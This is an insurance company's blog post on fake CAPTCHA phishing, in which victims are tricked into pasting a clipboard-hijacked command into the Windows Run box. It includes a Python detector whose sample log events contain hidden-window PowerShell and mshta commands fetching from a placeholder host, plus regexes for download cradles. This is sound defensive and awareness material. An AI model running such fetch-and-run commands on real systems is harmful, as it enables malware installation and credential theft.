Axis Insurance Services Blog

Did CAPTCHA catch you?: The New Phishing

Written by Drew Smith | Jun 4, 2026 7:13:09 PM

All through 2025, one alarming trend stood out in the world of cybercrime: fake CAPTCHAs. These fake CAPTCHAs have caught many people off guard, and the rate of this attack method increased exponentially in 2025 alone. It catches people off guard because they don't normally pay attention to a CAPTCHA.

CAPTCHA, or the Completely Automated Public Turing Test, is designed with bots and computers in mind. The idea is simple: there are some things bots and AI cannot recognize, such as specific phrases, letters, and words. In the classic CAPTCHAs now being phased out, the words are jumbled up and distorted. Early bots could not find the correct letters, while humans, able to discern patterns, could, which revealed who was a bot and who wasn't. Users often encounter CAPTCHA and reCAPTCHA tests on the Internet. Such tests are one way of managing bot activity, although the approach has its drawbacks. In a twist of irony, this process is also automated by the websites running these programs. (1)

In their 2026 annual report, CrowdStrike brings attention to several trends in the world of cybercrime. This data includes:

  • 89 percent increase in AI-enabled attacks
  • 82 percent of detections were malware-free
  • An average of 29 minutes between initial breach and compromise of other systems; a breakout time as short as 27 seconds was also reported. (2)

In that same report, they raised an alarming concern about the CAPTCHA system. According to CrowdStrike's report, last year many cybercriminals moved away from browser-update phishing lures toward fake CAPTCHA tactics.

Compared with 2024 security event data, the research team reported a 563% increase in CAPTCHA lures in 2025, relative to browser update lures. The increase is so massive that many hackers have started to retire the browser-based lures that had dominated for years. (3)

The attack is very simple in its execution, and it relies on inattention, muscle memory and social engineering:

1. Malicious Redirect: A web user visits a compromised website and is redirected to another webpage, where they’re presented with a familiar and seemingly harmless CAPTCHA challenge (see Figure 1).

2. JavaScript Clipboard Hijack: Simply by the user visiting the website, a malicious command is silently copied to their clipboard via JavaScript, without their knowledge.

3. Unusual Run Prompt: Instead of clicking on how many traffic lights or bridges they see, the user is instructed to open a Run prompt—a Windows feature for quickly executing commands, opening programs and accessing files—and paste the pre-copied command, unknowingly running the malicious script.

4. Malware Installation: The command leads to the installation of malware, often resulting in credential theft, as login details for systems, applications, and services are harvested and sent to attackers.(4)
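Because step 3 launches the pasted command from the Run box, the resulting process has the Windows shell (explorer.exe) as its parent, which gives defenders a simple lineage-based check. The following detector is an added example written for this post, not code from CrowdStrike or any other source cited here; it runs over a few constructed, Sysmon-style process-creation records and the paths, indicators and placeholder domain (example.invalid) are assumptions for illustration.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style, flattened to
# key=value pairs separated by '|'). These are made-up for illustration; the command
# lines deliberately contain no '|' so the simple splitter below is sufficient.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -w hidden -c iwr https://example.invalid/verify",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad",
    r"ParentImage=C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File build.ps1",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta https://example.invalid/captcha",
]

# Interpreters a fake-CAPTCHA page typically asks the victim to launch from the Run box.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits worth flagging when the parent is the desktop shell (explorer.exe).
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+\S", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|curl|bitsadmin)\b", re.I),
}

def parse_event(line: str) -> dict:
    """Split a flattened 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path: str) -> str:
    """Last path component, lower-cased, so image paths compare by executable name."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> list:
    """Return the indicator names that fire for one event; an empty list means benign."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []  # Run-box launches have explorer.exe as parent; others are out of scope
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def detect_clickfix(lines) -> list:
    """Return (index, reasons) for every event that looks like a pasted Run-box payload."""
    hits = []
    for i, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(reasons)}")
```

In a real deployment the same lineage check (explorer.exe spawning an interpreter with a URL, hidden window or encoded command) maps directly onto an EDR or SIEM rule, and the Run-box history under the user's RunMRU registry key gives a second place to look during triage.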

The very fact that a simple "verify you're not a robot" check can be turned against you is worrying, to say the least, when it comes to protecting your data. Still, there are a few ways to spot whether a CAPTCHA is legitimate. The first is to check the website URL. When you go to the website you were searching for and are suddenly redirected somewhere else, check the URL. If the URL doesn't match the site you expected, or the page doesn't match up with a genuine provider such as Cloudflare, back out and report it to the appropriate administrator.

The other is to ignore the Run prompt. No legitimate website will require you to open the Run prompt just from clicking on it. If you see a message telling you to paste and run a command, close it immediately. The command they have provided is the code they need to get into your device. If you do paste the command, the fact that you put it in yourself won't trigger antivirus to scan and pick it up. In the attackers' minds, why waste the effort when you can use the victims' inattention and apathy against them?

CAPTCHAs are designed to ensure that bots are not running on your websites and creating false clicks. Hackers have unfortunately found a way to use this against many people, and it has gone from a new fad to a common tactic in their attacks. You can counter these with careful observation, vigilance and making sure the websites you visit are legitimate.